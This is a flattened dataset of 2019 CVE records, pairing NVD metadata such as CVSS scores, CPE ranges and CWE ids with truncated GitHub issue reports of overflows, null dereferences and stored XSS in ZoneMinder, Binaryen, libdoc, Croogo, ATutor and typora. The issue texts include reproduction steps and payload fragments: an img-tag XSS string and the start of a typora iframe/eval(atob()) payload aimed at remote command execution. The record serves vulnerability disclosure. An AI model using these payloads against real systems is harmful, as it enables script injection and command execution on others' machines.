"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2478"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"787"
] | 787 | https://github.com/ZoneMinder/zoneminder/issues/2478 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
A Stack overflows occur when variable size data is copied into fixed length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally cons... | Stack based buffer Overflow - /src/zm_user.cpp (zmu) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2478/comments | 1 | 2019-01-25T03:16:25Z | 2019-01-25T13:48:05Z | https://github.com/ZoneMinder/zoneminder/issues/2478 | 402,988,560 | 2,478 | 75 |
CVE-2019-6992 | 2019-01-28T20:29:00.437 | A stored-self XSS exists in web/skins/classic/views/controlcaps.php of ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code in a vulnerable field via a long NAME or PROTOCOL to the index.php?view=controlcaps URI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/8c5687ca308e441742725e0aff9075779fa1a498"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStart... | [
"79"
] | 79 | https://github.com/ZoneMinder/zoneminder/issues/2445 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `controlcaps`, displays the `Protocol` field record with no proper filtration, leading to Self - Stored XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?v... | Stored Self-Cross Site Scripting (XSS) - controlcaps.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2445/comments | 0 | 2019-01-24T18:53:08Z | 2019-01-25T13:35:10Z | https://github.com/ZoneMinder/zoneminder/issues/2445 | 402,847,762 | 2,445 | 76 |
CVE-2019-7151 | 2019-01-29T00:29:00.517 | A NULL pointer dereference was discovered in wasm::Module::getFunctionOrNull in wasm/wasm.cpp in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1881"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExclu... | [
"476"
] | 476 | https://github.com/WebAssembly/binaryen/issues/1881 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Null pointer Deference problem was discovered in wasm::Module::getFunctionOrNull(wasm::Name). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "wasm-opt $POC" to reproduce the problem.
[POC.zip](https://github.com/... | Null pointer Deference in wasm::Module::getFunctionOrNull(wasm::Name) | https://api.github.com/repos/WebAssembly/binaryen/issues/1881/comments | 1 | 2019-01-20T12:11:54Z | 2019-01-20T18:08:15Z | https://github.com/WebAssembly/binaryen/issues/1881 | 401,091,528 | 1,881 | 77 |
CVE-2019-7152 | 2019-01-29T00:29:00.563 | A heap-based buffer over-read was discovered in wasm::WasmBinaryBuilder::processFunctions() in wasm/wasm-binary.cpp (when calling wasm::WasmBinaryBuilder::getFunctionIndexName) in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1880"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExclu... | [
"125"
] | 125 | https://github.com/WebAssembly/binaryen/issues/1880 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Heap-buffer-overflow problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "./wasm-opt $POC" to reproduce the error.
[POC.zip](https://git... | A Heap-buffer-overflow problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int) | https://api.github.com/repos/WebAssembly/binaryen/issues/1880/comments | 1 | 2019-01-20T12:07:15Z | 2019-01-20T18:05:01Z | https://github.com/WebAssembly/binaryen/issues/1880 | 401,091,205 | 1,880 | 78 |
CVE-2019-7153 | 2019-01-29T00:29:00.597 | A NULL pointer dereference was discovered in wasm::WasmBinaryBuilder::processFunctions() in wasm/wasm-binary.cpp (when calling wasm::WasmBinaryBuilder::getFunctionIndexName) in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1879"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExclu... | [
"476"
] | 476 | https://github.com/WebAssembly/binaryen/issues/1879 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Null pointer Deference problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int) in wasm/wasm-binary.cpp. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "wasm-opt $POC" to reproduce the probl... | Null pointer Deference in WasmBinaryBuilder::getFunctionIndexName(unsigned int) in wasm/wasm-binary.cpp | https://api.github.com/repos/WebAssembly/binaryen/issues/1879/comments | 2 | 2019-01-20T12:02:25Z | 2019-01-24T18:05:45Z | https://github.com/WebAssembly/binaryen/issues/1879 | 401,090,832 | 1,879 | 79 |
CVE-2019-7154 | 2019-01-29T00:29:00.627 | The main function in tools/wasm2js.cpp in Binaryen 1.38.22 has a heap-based buffer overflow because Emscripten is misused, triggering an error in cashew::JSPrinter::printAst() in emscripten-optimizer/simple_ast.h. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm2js. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/binaryen/issues/1876"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078",
"versionEndExcluding": "65",
"versionEndIncluding": null,
"versionStartExclu... | [
"787"
] | 787 | https://github.com/WebAssembly/binaryen/issues/1876 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"binaryen"
] | Hi, there.
A Heap-buffer-overflow problem was discovered in cashew::JSPrinter::printAst() function in simple_ast.h in emscripten-optimizer, as distributed in Binaryen 1.38.22. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too.
Here are the POC files. Please use "./... | A Heap-buffer-overflow problem was discovered in cashew::JSPrinter::printAst() function in simple_ast.h | https://api.github.com/repos/WebAssembly/binaryen/issues/1876/comments | 0 | 2019-01-19T07:42:40Z | 2019-01-23T01:15:38Z | https://github.com/WebAssembly/binaryen/issues/1876 | 400,971,559 | 1,876 | 80 |
CVE-2019-7156 | 2019-01-29T08:29:00.207 | In libdoc through 2019-01-28, calcFileBlockOffset in ole.c allows division by zero. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106813"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/uvoteam/libdoc/issues/5... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libdoc_project:libdoc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B7CDA2C-09E3-4504-8C5B-1B3B230017E2",
"versionEndExcluding": null,
"versionEndIncluding": "2019-01-28",
"versionS... | [
"369"
] | 369 | https://github.com/uvoteam/libdoc/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"uvoteam",
"libdoc"
] | A crafted input will lead to ’division by zero‘ in ole.c:390 at libdoc master branch(2019/1/29) when using libdoc.a
Triggered by
```
gcc main.c -o doc2txt -L ../build/ -lasan -fsanitize=address -ggdb ../build/libdoc.a
doc2txt [infile]
```
Poc
[libdoc_poc3.zip](https://github.com/uvoteam/libdoc/files/2805885/... | division by zero in ole.c:390 at libdoc master branch(2019/1/29) when using libdoc.a | https://api.github.com/repos/uvoteam/libdoc/issues/5/comments | 2 | 2019-01-29T03:14:13Z | 2019-01-31T19:22:58Z | https://github.com/uvoteam/libdoc/issues/5 | 404,103,525 | 5 | 81 |
CVE-2019-7168 | 2019-01-29T18:29:00.227 | A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Blog field to /admin/nodes/nodes/add/blog. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/croogo/croogo/issues/886"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.5",
"versionStartExcluding... | [
"79"
] | 79 | https://github.com/croogo/croogo/issues/886 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"croogo",
"croogo"
] | **Description -**
There's no escape being done before printing out the value of `Blog` in the Content page.
**Croogo version -** v3.0.5
**Steps to reproduce -**
- Navigate to http://localhost/croogo/admin/nodes/nodes/add/blog & add the below-shared payload as the Blog field value.
Payload - Introduction ... | Stored XSS in "Blog" field - Content | https://api.github.com/repos/croogo/croogo/issues/886/comments | 0 | 2019-01-16T11:58:30Z | 2019-08-23T15:40:21Z | https://github.com/croogo/croogo/issues/886 | 399,776,098 | 886 | 82 |
CVE-2019-7169 | 2019-01-29T18:29:00.287 | A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/menus/menus/edit/3. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/croogo/croogo/issues/888"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.5",
"versionStartExcluding... | [
"79"
] | 79 | https://github.com/croogo/croogo/issues/888 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"croogo",
"croogo"
] | **Description -**
There's no escape being done before printing out the value of `Title` in the Main Menu page.
**croogo version -** v3.0.5
**Steps to reproduce -**
- Navigate to http://localhost/croogo/admin/menus/menus/edit/3 & add the below-shared payload as the value to the Title field.
Payload -`Main ... | Stored XSS in "Title" field - Main Menu | https://api.github.com/repos/croogo/croogo/issues/888/comments | 0 | 2019-01-16T12:00:04Z | 2019-08-23T15:40:21Z | https://github.com/croogo/croogo/issues/888 | 399,776,697 | 888 | 83 |
CVE-2019-7170 | 2019-01-29T18:29:00.317 | A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/taxonomy/vocabularies. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/croogo/croogo/issues/890"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.5",
"versionStartExcluding... | [
"79"
] | 79 | https://github.com/croogo/croogo/issues/890 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"croogo",
"croogo"
] | **Description -**
There's no escape being done before printing out the value of `Title` in the Vocabulary page.
**croogo version -** v3.0.5
**Steps to reproduce -**
- Navigate to http://localhost/croogo/admin/taxonomy/vocabularies/add & add the below-shared payload as the values to the Title field.
Payl... | Stored XSS in "Title" field - Vocabulary page | https://api.github.com/repos/croogo/croogo/issues/890/comments | 1 | 2019-01-16T12:01:39Z | 2019-08-23T15:40:22Z | https://github.com/croogo/croogo/issues/890 | 399,777,280 | 890 | 84 |
CVE-2019-7171 | 2019-01-29T18:29:00.367 | A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/blocks/blocks/edit/8. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/croogo/croogo/issues/887"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.5",
"versionStartExcluding... | [
"79"
] | 79 | https://github.com/croogo/croogo/issues/887 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"croogo",
"croogo"
] | **Description -**
There's no escape being done before printing out the value of `Title` in the Blocks page.
**croogo version -** v3.0.5
**Steps to reproduce -**
- Navigate to http://localhost/croogo/admin/blocks/blocks/edit/8 & add the below-shared payload as the Title field value.
Payload -`<img src=xss ... | Stored XSS in "Title" field - Blocks | https://api.github.com/repos/croogo/croogo/issues/887/comments | 0 | 2019-01-16T11:59:19Z | 2019-08-23T15:40:21Z | https://github.com/croogo/croogo/issues/887 | 399,776,411 | 887 | 85 |
CVE-2019-7172 | 2019-01-29T18:29:00.413 | A stored-self XSS exists in ATutor through v2.2.4, allowing an attacker to execute HTML or JavaScript code in a vulnerable Real Name field to /mods/_core/users/admins/my_edit.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/atutor/ATutor/issues/164"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:atutor:atutor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7DAE444F-3475-41BE-AB95-1EDBA4B9604F",
"versionEndExcluding": null,
"versionEndIncluding": "2.2.4",
"versionStartExcluding... | [
"79"
] | 79 | https://github.com/atutor/ATutor/issues/164 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"atutor",
"ATutor"
] | **Description -**
There's no escape being done before printing out the value of `Real Name` in the My Account page.
**ATutor version -** v2.2.4
**Steps to reproduce -**
- Navigate to http://localhost/atutor/mods/_core/users/admins/my_edit.php & add the below-shared payload as the value to the Real Name field.... | Stored XSS in "Real Name" field - My Account | https://api.github.com/repos/atutor/ATutor/issues/164/comments | 4 | 2019-01-16T11:55:48Z | 2019-09-09T18:09:18Z | https://github.com/atutor/ATutor/issues/164 | 399,775,140 | 164 | 86 |
CVE-2019-7173 | 2019-01-29T18:29:00.460 | A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/file-manager/attachments/edit/4. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/croogo/croogo/issues/889"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D",
"versionEndExcluding": null,
"versionEndIncluding": "3.0.5",
"versionStartExcluding... | [
"79"
] | 79 | https://github.com/croogo/croogo/issues/889 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"croogo",
"croogo"
] | **Description -**
There's no escape being done before printing out the value of `Title` in the Attachment page.
**Croogo version -** v3.0.5
**Steps to reproduce -**
- Navigate to http://localhost/croogo/admin/file-manager/attachments/edit/4 & add the below-shared payload as the value to the Title field.
... | Stored XSS in "Title" field - Attachment page | https://api.github.com/repos/croogo/croogo/issues/889/comments | 0 | 2019-01-16T12:01:11Z | 2019-08-23T15:40:22Z | https://github.com/croogo/croogo/issues/889 | 399,777,117 | 889 | 87 |
CVE-2018-20748 | 2019-01-30T18:29:00.257 | LibVNC before 0.9.12 contains multiple heap out-of-bounds write vulnerabilities in libvncclient/rfbproto.c. The fix for CVE-2018-20019 was incomplete. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-390195.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/LibVNC... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libvnc_project:libvncserver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DEF1BF44-78B8-44E3-9A5A-29AB8111322B",
"versionEndExcluding": "0.9.12",
"versionEndIncluding": null,
"versio... | [
"787"
] | 787 | https://github.com/LibVNC/libvncserver/issues/273 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibVNC",
"libvncserver"
] | The fixes for #247 are incomplete, as I explained in:
https://www.openwall.com/lists/oss-security/2018/12/10/8
"Upstream's fix appears to be to add casts to (uint64_t) before adding 1 in those many malloc() calls. On platforms with larger than 32-bit size_t, this should be sufficient against integer overflows si... | SECURITY: malloc((uint64_t)length + 1) is unsafe, especially on 32-bit systems | https://api.github.com/repos/LibVNC/libvncserver/issues/273/comments | 9 | 2018-12-13T10:37:17Z | 2019-01-30T17:46:52Z | https://github.com/LibVNC/libvncserver/issues/273 | 390,616,835 | 273 | 88 |
CVE-2019-7233 | 2019-01-30T21:29:00.333 | In libdoc through 2019-01-28, doc2text in catdoc.c has a NULL pointer dereference. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/uvoteam/libdoc/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libdoc_project:libdoc:20190128:*:*:*:*:*:*:*",
"matchCriteriaId": "1E03929A-0770-4058-B4DD-423FA3FA94DC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSt... | [
"476"
] | 476 | https://github.com/uvoteam/libdoc/issues/6 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"uvoteam",
"libdoc"
] | A parameter which do not exist will lead to Segmentation fault in catdoc.c:34 at libdoc master branch(2019/1/29) when using libdoc.a
Triggered by
```
gcc main.c -o doc2txt -L ../build/ -lasan -fsanitize=address -ggdb ../build/libdoc.a
doc2txt [A filename which not exist]
```
Poc
./doc2txt d_000094,sig_06,src_... | Segmentation fault in catdoc.c:34 at libdoc master branch(2019/1/29) when using libdoc.a | https://api.github.com/repos/uvoteam/libdoc/issues/6/comments | 1 | 2019-01-30T01:57:15Z | 2019-01-31T18:41:44Z | https://github.com/uvoteam/libdoc/issues/6 | 404,567,164 | 6 | 89 |
CVE-2019-7250 | 2019-01-31T09:29:00.673 | An issue was discovered in the Cross Reference Add-on 36 for Google Docs. Stored XSS in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary JavaScript code (via SCRIPT elements, event handlers, etc.). Since this code is stored by the plu... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/davidrthorn/cross_reference/issues/32"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cross_reference_project:cross_reference:36:*:*:*:*:google_docs:*:*",
"matchCriteriaId": "06E1B2BE-ECCD-4677-8DC9-3A6A4575BF47",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"79"
] | 79 | https://github.com/davidrthorn/cross_reference/issues/32 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"davidrthorn",
"cross_reference"
] | ### Overall description
A stored XSS vulnerability in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary javascript code (via script tags, event handlers, etc.).
Since the code is stored by the plugin, the attacker may be able to targ... | Stored XSS vulnerability in preview boxes via label and references text | https://api.github.com/repos/davidrthorn/cross_reference/issues/32/comments | 2 | 2019-01-30T16:04:38Z | 2020-04-29T07:39:25Z | https://github.com/davidrthorn/cross_reference/issues/32 | 404,842,377 | 32 | 90 |
CVE-2019-7295 | 2019-01-31T21:29:00.347 | typora through 0.9.63 has XSS, with resultant remote command execution, during block rendering of a mathematical formula. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues/2129"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Th... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8ABDC3C-2AC4-46A7-AA26-B645B85B426F",
"versionEndExcluding": null,
"versionEndIncluding": "0.9.63",
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/typora/typora-issues/issues/2129 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"typora",
"typora-issues"
] | When open the document with the following content,it will **execute commands**.
The **Linux,Windows** and **Mac** version between **0.9.60~0.9.63** are all affected.
Here is a poc on windows:
```markdown
$$
</script><iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmR... | A XSS with resultant remote command execution when Typora rendering Mathematical formula | https://api.github.com/repos/typora/typora-issues/issues/2129/comments | 3 | 2019-01-25T16:06:05Z | 2019-02-02T05:07:36Z | https://github.com/typora/typora-issues/issues/2129 | 403,220,681 | 2,129 | 91 |
CVE-2019-7296 | 2019-01-31T21:29:00.397 | typora through 0.9.64 has XSS, with resultant remote command execution, during inline rendering of a mathematical formula. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
